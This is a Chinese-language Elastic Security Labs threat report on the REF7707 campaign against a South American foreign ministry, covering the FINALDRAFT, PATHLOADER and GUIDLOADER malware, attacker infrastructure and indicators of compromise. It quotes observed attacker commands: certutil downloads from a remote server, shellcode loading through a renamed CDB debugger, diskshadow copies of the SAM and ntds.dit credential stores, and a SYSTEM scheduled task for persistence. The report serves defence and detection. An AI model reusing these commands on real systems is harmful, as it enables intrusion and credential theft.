REF7707 概述
Elastic Security Labs 一直在监控针对南美国家外交部的攻击活动,该活动与东南亚的其他攻击活动有关联。我们将此活动跟踪为 REF7707。
虽然 REF7707 活动的特点是精心设计、功能强大、入侵手段新颖,但活动所有者却表现出糟糕的活动管理以及不一致的规避做法。
REF7707 使用的入侵集包括我们称为 FINALDRAFT、GUIDLOADER 和 PATHLOADER 的新型恶意软件家族。我们在 REF7707 -您有恶意软件:FINALDRAFT 隐藏在您的草稿中的恶意软件分析报告对其功能和能力进行了详细的分析。
关键要点
- REF7707 利用新型恶意软件攻击多个目标
- FINALDRAFT 恶意软件有 Windows 和 Linux 版本
- REF7707 使用不常见的 LOLBin 来获取端点执行
- 大量使用云和第三方服务进行 C2
- 攻击者使用了薄弱的操作安全性,暴露了此活动中未使用的其他恶意软件和基础设施
活动概述
2024 年 11 月下旬,Elastic 安全实验室观察到南美国家外交部发生了密集的端点行为警报集群。随着调查的继续,我们发现了一场庞大的活动和入侵事件,其中包括新型恶意软件、复杂的目标定位和成熟的操作节奏。
虽然该活动的部分内容显示出高水平的规划和技术能力,但许多战术疏忽暴露了恶意软件的预生产样本、基础设施和其他受害者。
活动布局(钻石模型)
Elastic Security Labs 利用钻石模型来描述对手、能力、基础设施和入侵受害者之间的高级关系。虽然钻石模型最常用于单一入侵,并利用活动线程(第 8 节)来创建事件之间的关系,但以对手为中心的模型(第 7.1.4 节)该方法允许生成单个钻石(尽管有些混乱)。
执行流程
主执行链
REF7707 最初是通过南美国家外交部的 Elastic Security 遥测发现的。我们观察到一种常见的 LOLBin 策略,使用 Microsoft 的 certutil应用程序从远程服务器下载文件并将其保存在本地。
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar
certutil -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini
certutil -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log托管fontdrvhost.exe 、 fontdrvhost.rar 、 config.ini和wmsetup.log的 Web 服务器位于同一组织内;但是,它并未运行 Elastic Agent。这是第一次观察到的横向运动,并提供了有关入侵的见解。我们将更详细地讨论这些文件,但目前, fontdrvhost.exe是一个调试工具, config.ini是一个武器化的 INI 文件,而fontdrvhost.rar无法恢复。
执行程序
Windows 远程管理的远程 Shell 插件 (WinrsHost.exe) 用于从连接的网络上的未知源系统将文件下载到该系统。该插件是 Windows 远程管理使用的客户端进程。这表明攻击者已经拥有有效的网络凭证,并正在使用它们从环境中先前受到感染的主机进行横向移动。这些凭证是如何获得的尚不清楚;这些凭证可能是从托管可疑文件的 Web 服务器获得的。
攻击者将fontdrvhost.exe 、 fontdrvhost.rar 、 config.ini和wmsetup.log下载到C:\ProgramData\目录;从那里,攻击者转移到其他几个 Windows 端点。虽然我们无法识别所有暴露的凭据,但我们注意到使用本地管理员帐户下载这些文件。
从 Web 服务器下载到端点后,我们看到一组行为规则快速连续地触发。
在六个 Windows 系统上,我们观察到未识别的二进制文件 ( 08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1 ) 作为Services.exe的子进程执行。该可疑二进制文件使用由六个驼峰式字母组成的伪随机分配的文件名,带有.exe扩展名,位于C:\Windows\路径中(例如: C:\Windows\cCZtzzwy.exe )。我们无法收集此文件进行分析,但根据文件大小( PATHLOADER字节)及其位置,我们推断这是170,495的变体。该文件通过 SMB 在系统之间传递。
FontDrvHost.exe
一旦攻击者收集到fontdrvhost.exe 、 fontdrvhost.rar 、 config.ini和wmsetup.log ,它就会执行fontdrvhost.exe ( cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9 ) 以继续入侵。fontdrvhost.exe是Windows 签名的调试器CDB.exe的重命名版本。滥用该二进制文件使得我们的攻击者能够以受信任的二进制文件为幌子执行config.ini文件中传递的恶意 shellcode。
CDB 是一个已有 15 年历史的调试器。在研究向 VirusTotal 提交可疑文件的频率时,我们发现 2021 中的活动有所增加,并且从 2024 年底开始急剧加速。
CDB 是一个有文档记录的 LOLBas 文件,但是关于它如何被滥用的研究并不多。安全研究员 mrd0x 撰写了一篇关于 CDB 的出色分析,概述了如何使用它来运行 shellcode、启动可执行文件、运行 DLL、执行 shell 命令以及终止安全解决方案(甚至还有来自 2016 的一篇较早的分析使用它作为 shellcode 运行器)。虽然并不新颖,但这是一种不常见的攻击方法,可以与其他入侵元数据一起使用,以链接各个活动的参与者。
虽然config.ini没有被收集起来进行分析,但它包含一个fontdrvhost.exe用来加载 shellcode 的机制;其调用方式与 FINALDRAFT 类似。
C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe-cf- 指定脚本文件的路径和名称。调试器启动后立即执行此脚本文件config.ini- 这是要加载的脚本-o- 调试目标应用程序启动的所有进程
然后fontdrvhost.exe生成mspaint.exe并将 shellcode 注入其中。
Elastic Security Labs 的逆向工程师分析了此 shellcode,以识别和描述 FINALDRAFT 恶意软件。最后, fontdrvhost.exe向内存( 6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3 )中注入了额外的 shellcode,该代码也被标识为 FINALDRAFT 恶意软件。
根据 FINALDRAFT分析中的描述,如果注入相关命令没有提供目标参数,恶意软件会默认为mspaint.exe或conhost.exe 。
连接检查
对手使用ping.exe命令和通过 PowerShell 执行了多项连接测试。
Powershell 的Invoke-WebRequest cmdlet 类似于wget或curl, ,用于拉取网络资源的内容。此 cmdlet 可用于从命令行下载工具,但这里并非如此。这些与多个ping相关的请求更可能是连接性检查。
graph.microsoft[.]com和login.microsoftonline[.]com是合法拥有的 Microsoft 网站,为 Microsoft 的 Outlook 云电子邮件服务和其他 Office 365 产品提供 API 和 Web GUI 流量。
ping graph.microsoft[.]comping www.google[.]comPowershell Invoke-WebRequest -Uri \"hxxps://google[.]com\Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsingPowershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing
digert.ictnsc[.]com和 support.vmphere[.]com是对手拥有的基础设施。
ping digert.ictnsc[.]comPowershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing
我们将在下面的基础设施部分中介绍有关这些网络域的更多信息。
侦察/枚举/凭证收集
攻击者使用diskshadow.exe实用程序执行了名为SoftwareDistribution.txt的未知脚本,提取了 SAM、SECURITY 和 SYSTEM 注册表配置单元,并复制了 Active Directory 数据库 ( ntds.dit )。这些材料主要包含凭证和凭证元数据。对手使用 7zip 实用程序压缩结果:
diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt
cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y
cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y
cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y
cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y
7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"对手还列举了有关系统和域的信息:
systeminfo
dnscmd . /EnumZones
net group /domain
C:\\Windows\\system32\\net1 group /domain
quser
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID
reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"
reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"持久化
持久性是使用计划任务实现的,该计划任务每分钟以SYSTEM形式调用重命名的CDB.exe调试器和武器化的 INI 文件。这种方法确保 FINALDRAFT 驻留在内存中。
schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\"
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\"
/sc MINUTE /mo 1 /RU SYSTEMschtasks- 计划任务程序/create- 创建一个新的计划任务/RL HIGHEST- 指定作业的运行级别,HIGHEST以最高权限级别运行/F- 禁止警告/tn \\Microsoft\\Windows\\AppID\\EPolicyManager\- 任务名称,尝试镜像真实的计划任务/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\"- 要运行的任务,在本例中是我们之前介绍过的fontdrvhost.exe命令/sc MINUTE- 计划类型,MINUTE指定以分钟为间隔运行/mo 1- 修饰符,定义1表示计划间隔/RU SYSTEM- 定义以哪个帐户运行;在这种情况下,任务将以 SYSTEM 用户身份运行
FINALDRAFT 分析
有关 FINALDRAFT 和 PATHLOADER 恶意软件的功能和架构的技术深度介绍可在此处查阅。从高层次来看,FINALDRAFT 是一个精心设计、功能齐全的远程管理工具,能够接受扩展功能的附加模块并通过多种方式在内部代理网络流量。
尽管 FINALDRAFT 可以使用各种手段建立命令和控制,但最值得注意的是我们在受害者环境中观察到的手段,即滥用 Microsoft 的 Graph API 。我们首次在SIESTAGRAPH中观察到这种类型的第三方 C2,并于 2022 年 12 月进行了报告。
这种命令和控制类型对于严重依赖网络可见性的组织的防御者来说具有挑战性。初始执行和签入完成后,所有进一步的通信都将通过合法的 Microsoft 基础架构( graph.microsoft[.]com )进行,并与其他组织工作站融合。它还支持中继功能,使其能够代理其他受感染系统的流量。它逃避依赖基于网络的入侵检测和威胁情报指标的防御。
PATHLOADER 和 GUIDLOADER
PATHLOADER 和 GUIDLOADER 都用于在内存中下载并执行加密的 shellcode。在调查 FINALDRAFT 内存捕获中识别的 C2 基础设施和字符串时,在 VirusTotal 中发现了它们。它们仅与 FINALDRAFT 有效载荷一起被观察到。
VirusTotal 中 5 月 2023 的样本是 REF7707 入侵集最早被识别的二进制文件。该样本最初由来自泰国的一名网络用户提交, dwn.exe ( 9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf ) 是一个 PATHLOADER 变体,它从 poster.checkponit[.]com加载加密的 FINALDRAFT 二进制文件,并且 support.fortineat[.]com.
2023 年 6 月至 8 月期间,一位香港 VirusTotal 网络用户上传了12 个 GUIDLOADER 样本。这些样本对加密有效负载的下载方式进行了细微修改,并配置为使用 FINALDRAFT 域:
poster.checkponit[.]comsupport.fortineat[.]com- Google Firebase (
firebasestorage.googleapis[.]com) - Pastebin(
pastebin[.]com) - 东南亚大学面向公众的网络存储系统
GUIDLOADER 的一些样本似乎未完成或者已损坏,并且具有不起作用的解密例程,而其他样本则包含嵌入在二进制文件中的调试字符串。这些变化表明样本是开发和测试过程的一部分。
FINALDRAFT bridging OS’
2024 年末,两个 Linux ELF FINALDRAFT 变种被上传到 VirusTotal,一个来自美国,一个来自巴西。这些样本具有类似的 C2 多功能性以及 Windows 版本中可用的命令的部分重新实现。从这些文件中提取了support.vmphere[.]com 、 update.hobiter[.]com和 pastebin.com.
基础设施分析
在FINALDRAFT恶意软件分析报告中,REF7707入侵事件中收集的样本中识别出了多个域,其他样本则通过代码相似性进行识别。
服务横幅哈希
Censys 搜索hobiter[.]com (上一节讨论过的 FINALDRAFT 的 ELF 变体中观察到的域)返回 IP 地址47.83.8.198 。该服务器位于香港,服务端口80和443 。字符串“ hobiter[.]com ”与端口443上的 TLS 证书相关联。对此端口的服务横幅哈希进行 Censys 查询透视会产生六个共享该哈希的额外服务器(总共七个)。
| IP | TLS 证书名称 | Cert CN | 端口 | ASN | GEO |
|---|---|---|---|---|---|
47.83.8.198 | *.hobiter[.]com | CloudFlare 原产地证书 | 80, 443 | 45102 | 中国香港 |
8.218.153.45 | *.autodiscovar[.]com | CloudFlare 原产地证书 | 53, 443, 2365, 3389, 80 | 45102 | 中国香港 |
45.91.133.254 | *.vm-clouds[.]net | CloudFlare 原产地证书 | 443, 3389 | 56309 | 泰国 暖武里府 |
8.213.217.182 | *.ictnsc[.]com | CloudFlare 原产地证书 | 53, 443, 3389, 80 | 45102 | Bangkok, Thailand |
47.239.0.216 | *.d-links[.]net | CloudFlare 原产地证书 | 80, 443 | 45102 | 中国香港 |
203.232.112.186 | [没有任何] | [没有任何] | 80, 5357, 5432, 5985, 8000, 8080, 9090, 15701, 15702, 15703, 33990 47001 | 4766 | 韩国 大田 |
13.125.236.162 | [没有任何] | [没有任何] | 80, 3389, 8000, 15111, 15709, 19000 | 16509 | 韩国仁川 |
两台服务器( 203.232.112[.]186和13.125.236[.]162 )不与其他五台共享相同的配置文件。虽然服务横幅哈希仍然匹配,但它不在端口443上,而是在端口15701 、 15702 、 15703和15709上。此外,有问题的端口似乎不支持 TLS 通信。我们并未高度自信地将它们归因于 REF7707,但为了完整性,仍将它们包括在内。
其余五台服务器(包括原始的“hobiter”服务器)有几个相似之处:
- 端口上的服务横幅哈希匹配
443 - 东南亚地理位置
- Windows OS
- Cloudflare 颁发了 TLS 证书
- 大多数都具有相同的 ASN,属于阿里巴巴
Hobiter 和 VMphere
update.hobiter[.]com在 ELF 二进制文件 ( support.vmphere[.]com ) 中发现biosets.rar和
名称服务器查找hobiter[.]com和vmphere[.]com仅会产生每个 Cloudflare 名称服务器记录,而不会产生 A 记录。搜索其已知的子域名为我们提供了指向 Cloudflare 拥有的 IP 地址的 A 记录。
国际电信联盟
ping digert.ictnsc[.]com从攻击者执行的连接检查 ( ictnsc[.]com ) 来看, 8.213.217[.]182与上述 REF7707 入侵直接相关。与此域 ( ictnsc[.]com ) 关联的服务器是通过上述 HTTPS 服务上的 Censys 服务横幅哈希识别的。与其他已识别的基础设施一样,子域解析为 Cloudflare 拥有的 IP 地址,而父域仅具有 Cloudflare NS 记录。
虽然我们无法确认该关联是否为恶意的,但需要注意的是,域名ict.nsc[.]ru是联邦信息与计算技术研究中心的网络财产,通常称为 FRC 或 ICT。该俄罗斯组织在计算机建模、软件工程、数据处理、人工智能和高性能计算等多个领域开展研究。
虽然在 REF7707 入侵中没有观察到,但我们观察到的域 ( ictnsc[.]com ) 有一个ict子域 ( ict.ictnsc[.]com ),与ict.nsc[.]ru惊人地相似。同样,我们无法确认它们是否与合法的 FRC 或 ITC 有关,威胁行为者似乎有意让这些域名彼此相似、混合或混淆。
Autodiscovar
Autodiscovar[.]com尚未与任何 FINALDRAFT 恶意软件直接关联。它已通过网络基础设施标识符上的枢轴间接与 REF7707 基础设施相关联。父域仅具有 Cloudflare NS 记录。通过 VirusTotal ( cloud.autodiscovar[.]com ) 识别的子域指向 Cloudflare 拥有的 IP 地址。该域名与其他 FINALDRAFT 和 REF7707 网络基础设施类似,并共享 HTTPS 服务横幅哈希。该域名注册于2022年 8 月26 。
D-links 和 VM-clouds
d-links[.]net和vm-clouds[.]net均于2023年 9 月12注册,与hobiter[.]com和vmphere[.]com为同一天。托管这些网站的服务器也共享相同的 HTTPS 服务横幅哈希。它们与 FINALDRAFT 恶意软件没有直接关联,也没有当前可路由的子域,尽管pol.vm-clouds[.]net之前已注册。
福汀
support.fortineat[.]com已在 PATHLOADER 示例 ( dwn.exe ) 中硬编码。在分析该域名的过程中,我们发现该域名目前尚未注册。为了识别与该域通信的任何其他样本,我们的团队注册了该域并配置了一个 Web 服务器来监听传入的连接。
我们记录了通过端口443连接尝试,并从中识别出了特定的传入字节模式。这些连接来自东南亚八家不同的电信和互联网基础设施公司,表明可能是 REF7707 入侵套件的受害者。
检查点
poster.checkponit[.]com2023 年 5 月至 7 月期间,在四个 GUIDLOADER 样本和一个 PATHLOADER 样本中观察到了checkponit[.]com ,它被用来托管 FINALDRAFT 加密的 shellcode。checkponit[.]com注册于 8 月26 2022创建。目前没有poster.checkponit[.]com的 A 记录或
第三方基础设施
FINALDRAFT PE 和 ELF 变体使用 Microsoft 的graph.microsoft[.]com通过 Graph API 进行命令和控制。这项服务无处不在,用于使用 Office 365 的企业的关键业务流程。强烈建议防御者不要将此域名列入黑名单,除非了解业务后果。
Google 的 Firebase 服务 ( firebasestorage.googleapis[.]com )、Pastebin ( pastebin[.]com ) 和东南亚大学是第三方服务,用于托管加载器(PATHLOADER 和 GUIDLOADER)的加密负载,以下载和解密 FINALDRAFT 的最后阶段。
REF7707 时间线
结论
REF7707 是在调查入侵南美国家外交部事件时发现的。
调查发现了类似 FINALDRAFT 及其各种加载器等新型恶意软件。这些工具是使用内置操作系统功能进行部署和支持的,传统反恶意软件工具很难检测到。
FINALDRAFT 采用微软的图形 API 服务进行命令和控制,以最大限度地减少传统基于网络的入侵检测和预防系统可观察到的恶意指标。用于加密有效载荷阶段的第三方托管平台也在感染链早期对这些系统提出了挑战。
使用本报告中的指标对 VirusTotal 提交者和数据透视图进行概述,可以发现东南亚和南美洲的地理存在相对较大。同样,SIESTAGRAPH 是我们观察到的第一个在野外滥用图形 API 的案例,它(REF2924)涉及对东南亚国家外交部的攻击。
在 Elastic 安全实验室,我们倡导由知识渊博的专业人员操作的信息安全域的防御能力,以最大程度地缓解高级威胁。
REF7707 通过 MITRE ATT&CK
Elastic 使用MITRE ATT&CK框架来记录高级持续性威胁针对企业网络使用的常见策略、技术和程序。
检测 REF7707
雅拉
观察结果
本研究讨论了以下可观察的结果。
| 可观测 | 类型 | 名称 | 参考 |
|---|---|---|---|
39e85de1b1121dc38a33eca97c41dbd9210124162c6d669d28480c833e059530 | SHA-256 | Session.x64.dll | 最终草案 |
83406905710e52f6af35b4b3c27549a12c28a628c492429d3a411fdb2d28cc8c | SHA-256 | pfman | 最终选秀精灵 |
f45661ea4959a944ca2917454d1314546cc0c88537479e00550eef05bed5b1b9 | SHA-256 | biosets.rar | 最终选秀精灵 |
9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf | SHA-256 | dwn.exe | 路径加载器 |
41a3a518cc8abad677bb2723e05e2f052509a6f33ea75f32bd6603c96b721081 | SHA-256 | 5.exe | 引导加载程序 |
d9fc1cab72d857b1e4852d414862ed8eab1d42960c1fd643985d352c148a6461 | SHA-256 | 7.exe | 引导加载程序 |
f29779049f1fc2d45e43d866a845c45dc9aed6c2d9bbf99a8b1bdacfac2d52f2 | SHA-256 | 8.exe | 引导加载程序 |
17b2c6723c11348ab438891bc52d0b29f38fc435c6ba091d4464f9f2a1b926e0 | SHA-256 | 3.exe | 引导加载程序 |
20508edac0ca872b7977d1d2b04425aaa999ecf0b8d362c0400abb58bd686f92 | SHA-256 | 1.exe | 引导加载程序 |
33f3a8ef2c5fbd45030385b634e40eaa264acbaeb7be851cbf04b62bbe575e75 | SHA-256 | 1.exe | 引导加载程序 |
41141e3bdde2a7aebf329ec546745149144eff584b7fe878da7a2ad8391017b9 | SHA-256 | 11.exe | 引导加载程序 |
49e383ab6d092ba40e12a255e37ba7997f26239f82bebcd28efaa428254d30e1 | SHA-256 | 2.exe | 引导加载程序 |
5e3dbfd543909ff09e343339e4e64f78c874641b4fe9d68367c4d1024fe79249 | SHA-256 | 4.exe | 引导加载程序 |
7cd14d3e564a68434e3b705db41bddeb51dbb7d5425fd901c5ec904dbb7b6af0 | SHA-256 | 1.exe | 引导加载程序 |
842d6ddb7b26fdb1656235293ebf77c683608f8f312ed917074b30fbd5e8b43d | SHA-256 | 2.exe | 引导加载程序 |
f90420847e1f2378ac8c52463038724533a9183f02ce9ad025a6a10fd4327f12 | SHA-256 | 6.exe | 引导加载程序 |
poster.checkponit[.]com | 域名 | REF7707 基础设施 | |
support.fortineat[.]com | 域名 | REF7707 基础设施 | |
update.hobiter[.]com | 域名 | REF7707 基础设施 | |
support.vmphere[.]com | 域名 | REF7707 基础设施 | |
cloud.autodiscovar[.]com | 域名 | REF7707 基础设施 | |
digert.ictnsc[.]com | 域名 | REF7707 基础设施 | |
d-links[.]net | 域名 | REF7707 基础设施 | |
vm-clouds[.]net | 域名 | REF7707 基础设施 | |
47.83.8[.]198 | IPv4 地址 | REF7707 基础设施 | |
8.218.153[.]45 | IPv4 地址 | REF7707 基础设施 | |
45.91.133[.]254 | IPv4 地址 | REF7707 基础设施 | |
8.213.217[.]182 | IPv4 地址 | REF7707 基础设施 | |
47.239.0[.]216 | IPv4 地址 | REF7707 基础设施 |
参考资料
上述研究参考了以下内容:
- https://www.elastic.co/cn/security-labs/finaldraft
- https://mrd0x.com/the-power-of-cdb-debugging-tool/
- 20210305190100
关于 Elastic 安全实验室
Elastic 安全实验室致力于通过提供有关新兴威胁的公开研究来为威胁形势带来积极变化。
在 X @elasticseclabs上关注 Elastic Security Labs,并在www.elastic.co/security-labs/查看我们的研究。通过查看Elastic Security,您可以了解我们用于本研究的技术及更多内容。